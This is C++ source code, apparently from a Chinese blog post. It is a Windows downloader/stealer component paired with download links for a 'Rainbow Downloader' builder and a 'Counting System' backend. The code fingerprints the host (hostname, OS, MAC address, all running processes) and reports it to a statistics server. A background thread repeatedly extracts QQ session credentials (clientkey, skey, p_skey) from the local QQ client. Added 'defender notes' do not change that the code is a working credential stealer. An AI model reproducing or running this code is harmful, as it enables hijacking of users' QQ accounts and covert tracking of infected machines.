int _Result = 0;
// Winsock is initialised only so that gethostname can be called
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
// Fills the global osx with the OS name and an x64/x86 suffix
GetWinOS();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
szMac.ReleaseBuffer();
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
szProcess.ReleaseBuffer();
// Build the statistics URL (endpoint plus query string)
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
// The three WinINet entry points below are resolved at run time from
// wininet.dll; InternetReadFile further down is called directly.
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
// No user-agent string is supplied; the system's preconfigured proxy settings are used
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
// Only the first read (at most sizeof(buffer) bytes) of the reply is inspected
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
// Any of the three status words in the reply counts as "reported"
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
char *myMSG3;
myMSG3 = strstr(buffer, "Repeat");
if (myMSG1 || myMSG2 || myMSG3)
{
return TRUE;
}
else
{
// The submitted data is sometimes too long, which makes the report fail;
// leave out the szProcess process list here and report again.
TCHAR postData[1024] = { 0 };
ZeroMemory(postData, 1024 * sizeof(TCHAR));
lstrcpy(postData, szCountUrl);
lstrcat(postData, "?ver=");
lstrcat(postData, szVersion);
lstrcat(postData, "&ID=");
lstrcat(postData, szUserID);
lstrcat(postData, "&CP=");
lstrcat(postData, jsj);
lstrcat(postData, "&os=");
lstrcat(postData, osx);
lstrcat(postData, "&mac=");
lstrcat(postData, MAC);
if ( PostDataToCount(postData, "Success", "Fail", "Repeat") )
{
return TRUE;
}
else
{
return FALSE;
}
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
// PostDataToCount: opens szPostURL and checks the reply for a status word.
// szPostURL                    - complete URL, query string included
// szState1, szState2, szState3 - substrings to look for in the reply
// Returns TRUE when the first read of the response contains any of the three
// substrings, FALSE otherwise.
// Despite the name, no request body is supplied: the data travels in the URL
// passed to InternetOpenUrlA.
// Defender note: because the data is in the URL, web-proxy and server access
// logs that record full request URLs hold the reported values.
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3)
{
// WinINet entry points are resolved at run time from wininet.dll
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
// Only the first read (at most sizeof(buffer) bytes) of the reply is inspected
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
TCHAR *myMSG1;
myMSG1 = strstr(buffer, szState1);
TCHAR *myMSG2;
myMSG2 = strstr(buffer, szState2);
TCHAR *myMSG3;
myMSG3 = strstr(buffer, szState3);
if (myMSG1 || myMSG2 || myMSG3)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
// GetWinOS: writes a description of the operating system into the global osx.
// Reads the ProductName value under
// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion (64-bit registry view) and
// copies it to osx, or copies "Unknow System" when the value cannot be read.
// Then appends " x64" or " x86" according to IsWow64OSEx().
// When the key itself cannot be opened, osx is not cleared or rewritten and
// only the suffix is appended.
// Defender note: this is host fingerprinting; the resulting string is what the
// statistics request carries in its os= parameter.
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
// KEY_WOW64_64KEY selects the 64-bit view of the registry
long ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if (ret0 == ERROR_SUCCESS)
{
// 80-byte buffer for the value data; cbData_1 tells the API its size
LPBYTE owner_Get1 = new BYTE[80];
DWORD type_1 = REG_SZ;
DWORD cbData_1 = 80;
ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));
long ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if (ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// Decide whether this is a 64-bit system
if (IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
// IsWow64OSEx: returns the WOW64 state of the current process.
// IsWow64Process is looked up in kernel32 at run time; when the export is
// missing, the function returns FALSE.
// NOTE(review): IsWow64Process reports TRUE for a 32-bit process on 64-bit
// Windows, so the result answers "is the OS 64-bit" only if this program is
// built as 32-bit; confirm against the build configuration.
BOOL IsWow64OSEx()
{
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
// The call's own return value is ignored; bIsWow64 stays FALSE unless the call sets it
fnIsWow64Process(GetCurrentProcess(), &bIsWow64);
}
return bIsWow64;
}
// ASTAT: receive buffer for a NetBIOS adapter-status (NCBASTAT) request,
// holding the adapter status block followed by room for 30 name entries.
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt; // adapter status; adapter_address holds the 6-byte address read by GetMacAddress
NAME_BUFFER NameBuff[30]; // space for the name table that follows the status block
}ASTAT, *PASTAT;
// GetAddressByIndex: queries one NetBIOS LANA for its adapter status.
// lana_num - LANA number to query
// Adapter  - receives the adapter status block
// Returns the NetBIOS return code of the status request. The code returned by
// the preceding reset is overwritten and not checked.
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
// Step 1: reset the LANA
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
// Step 2: adapter status request; the call name begins with "*"
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
// GetMacAddress: returns an adapter address as 12 upper-case hex digits.
// Enumerates the NetBIOS LANA numbers (NCBENUM) and queries each one through
// GetAddressByIndex. Every successful query overwrites the result, so the
// value returned is that of the last LANA that answered.
// Returns an empty string when enumeration fails or no LANA answers.
// Defender note: the address serves as a per-host identifier in the statistics
// request (its mac= parameter), so repeated reports from one machine can be correlated.
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
// Six address bytes, two hex digits each, no separators
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}
// GetQQClientKey: thread routine that collects QQ web-login session values
// from a QQ client that is running on the same machine.
// pParam is unused. The loop never exits, so the trailing `return 0` is not reached.
// Each iteration: when a process named qq.exe is running, the routine performs
// up to five HTTPS exchanges and prints, in order, pt_local_token, uin,
// clientkey, skey and p_skey to cout. After a complete pass it sleeps
// 20 minutes. Every iteration ends with a 2-minute sleep.
// In the code visible in this function the values are only written to cout;
// no upload of them appears here.
// Defender notes:
//  - Network: requests to port 4301 on localhost.ptlogin2.weiyun.com carrying
//    the Referer https://ssl.xui.ptlogin2.weiyun.com/ and the User-Agent
//    "Microsoft Internet Explorer", made by a process that is neither the QQ
//    client nor a browser.
//  - Response: clientkey, skey and p_skey are session credentials. On a host
//    where this code ran, end the account's sessions (log out, change the
//    password) in addition to removing the binary.
static DWORD WINAPI GetQQClientKey(LPVOID pParam)
{
do{
// Look for a running QQ.exe process
if ( GetProcessName("qq.exe") )
{
// Set up the URL components
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";
char szHostName[128] = { 0 };
char szUrlPath[256] = { 0 };
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// Open the WinINet session (fixed User-Agent string, direct connection without proxy)
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet != NULL) {
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hHttpSession != NULL) {
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (hHttpRequest != NULL) {
BOOL bRet = FALSE;
// Send the HTTP request
bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
if (bRet) {
// Query the HTTP status code
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet) {
// Read the whole raw header block
char lpHeaderBuffer[1024] = { 0 };
dwSizeOfRq = 1024;
HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// Extract the pt_local_token value: scan backwards from the end of the
// header block for the name, then cut the value at the next ';'
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer) {
if (strstr(pt_local_token, "pt_local_token=")) {
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// Close handles
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;
/* Second exchange */
// Generate a 16-digit random number
time_t seed = time(NULL);
srand((unsigned)seed);
CString szRand1 = "", szRand2 = "";
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 5 + 48);
break;
default:
szRand1.Format("%C", rand() % 5 + 53);
}
szRand2 += szRand1;
Sleep(50);
}
char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);
szRand2.ReleaseBuffer();
// Build the URL path and query
char lpszUrlPath[1024] = { 0 };
strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");
strcat(lpszUrlPath, szRandNum); // append the 16 random digits
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token); // append pt_local_token
// Open the connection.
// NOTE(review): the host name and port 4301 suggest a listener of the local
// QQ client on the loopback interface; confirm against the protocol write-up
// this page refers to.
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// Send the HTTP request with the extra Referer header
char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
if (bRet)
{
// Query the HTTP status code
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Get the size of the returned data
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
if (bRet)
{
// Read the response body
char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
if (bRet)
{
// Extract the QQ uin (the account number) from the response body
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"uin\":"))
{
uin += sizeof("\"uin\":") - 1;
char* pEndBuffer = strstr(uin, "}");
*pEndBuffer = 0;
break;
}
uin--;
}
// Close handles
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] uin:" << uin << "\r\n" << endl;
delete[] lpBuffer;
/* Third exchange */
// Build the URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// Send the HTTPS request
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// Add the Referer header
char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";
bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);
if (bRet)
{
// Query the HTTP status code
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Read the whole raw header block
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
if (bRet)
{
// Extract the ClientKey value from the response headers
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
// Close handles
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] clientkey:" << clientkey << "\r\n" << endl;
/* Fourth exchange */
// Build the URL
ZeroMemory(lpszUrlPath, 1024);
strcat(lpszUrlPath, "/jump?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&clientkey=");
strcat(lpszUrlPath, clientkey);
strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");
// Send the HTTPS request
hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
// Add the Referer header
char lpReferer[128] = { 0 };
strcpy(lpReferer, "Referer: ");
strcat(lpReferer, "https://ptlogin2.qq.com/");
strcat(lpReferer, "\r\n");
HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// Query the HTTP status code
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Get the size of the returned data
DWORD dwNumberOfBytesAvailablex = 0;
InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);
// Read the returned response data
char* lpBufferx = new char[dwNumberOfBytesAvailablex + 1]();
InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);
// Print the response data
cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;
// Extract ptsigx from the response data for later use
char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;
while (ptsigx != lpBufferx)
{
if (strstr(ptsigx, "check_sig?"))
{
ptsigx += sizeof("check_sig");
char* pEndBuffer = strstr(ptsigx, "'");
*pEndBuffer = 0;
break;
}
ptsigx--;
}
// Build the ptsigx URL
CString szPtsigx = "";
szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);
cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;
delete[] lpBufferx;
// Read the whole raw header block
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// Extract the skey value from the response headers
char* skey = lpHeaderBuffer + dwSizeOfRq;
while (skey != lpHeaderBuffer)
{
if (strstr(skey, "skey="))
{
skey += sizeof("skey");
char* pEndBuffer = strstr(skey, ";");
*pEndBuffer = 0;
break;
}
skey--;
}
// Close handles
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
cout << "[+] Skey:" << skey << "\r\n" << endl;
/* Fifth exchange */
char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);
szPtsigx.ReleaseBuffer();
// Send the HTTPS request
hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (NULL != hHttpSession)
{
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (NULL != hHttpRequest)
{
bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);
if (bRet)
{
// Query the HTTP status code
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
if (bRet)
{
// Read the whole raw header block
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);
// Extract the p_skey value from the response headers
char* pskey = lpHeaderBuffer + dwSizeOfRq;
while (pskey != lpHeaderBuffer)
{
if (strstr(pskey, "p_skey="))
{
pskey += sizeof("p_skey");
char* pEndBuffer = strstr(pskey, ";");
*pEndBuffer = 0;
break;
}
pskey--;
}
cout << "[+] P_skey:" << pskey << "\r\n" << endl;
// Wait 20 minutes,
// then fetch everything again:
// each Clientkey
// is valid for 20 minutes (according to the author)
Sleep(1200000);
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
InternetCloseHandle(hHttpRequest);
}
InternetCloseHandle(hHttpSession);
}
InternetCloseHandle(hInternet);
}
}
// Wait two minutes,
// then look for the QQ process again
Sleep(120000);
} while (1);
return 0;
}
生成器下载
Rainbow Downloader 2023 Free v1.2 生成器下载【优快云】
Rainbow Downloader 2023 Free v1.2https://download.youkuaiyun.com/download/qq_39190622/88374503
Rainbow Downloader 2023 Free v1.2 生成器下载【蓝奏云】
Rainbow Downloader 2023 Free v1.2https://wwrd.lanzoum.com/id0Bi19w53sj
Rainbow Downloader 2023 Free v1.2 生成器下载【百度云 提取码:aw77】
Rainbow Downloader 2023 Free v1.2https://pan.baidu.com/s/1Is3Eb0Ayk1dJn8zBIyGyyw
统计后台下载
Rainbow Counting System 2023 Free v1.1 统计系统下载【优快云】
Rainbow Counting System 2023 Free v1.1https://download.youkuaiyun.com/download/qq_39190622/88374513
Rainbow Counting System 2023 Free v1.1 统计系统下载【蓝奏云】
Rainbow Counting System 2023 Free v1.1https://wwrd.lanzoum.com/iwG4M19w45ob
Rainbow Counting System 2023 Free v1.1 统计系统下载【百度云 提取码:i1fd】
Rainbow Counting System 2023 Free v1.1https://pan.baidu.com/s/1-VZs1-PV8ElCcBSSmqz7zA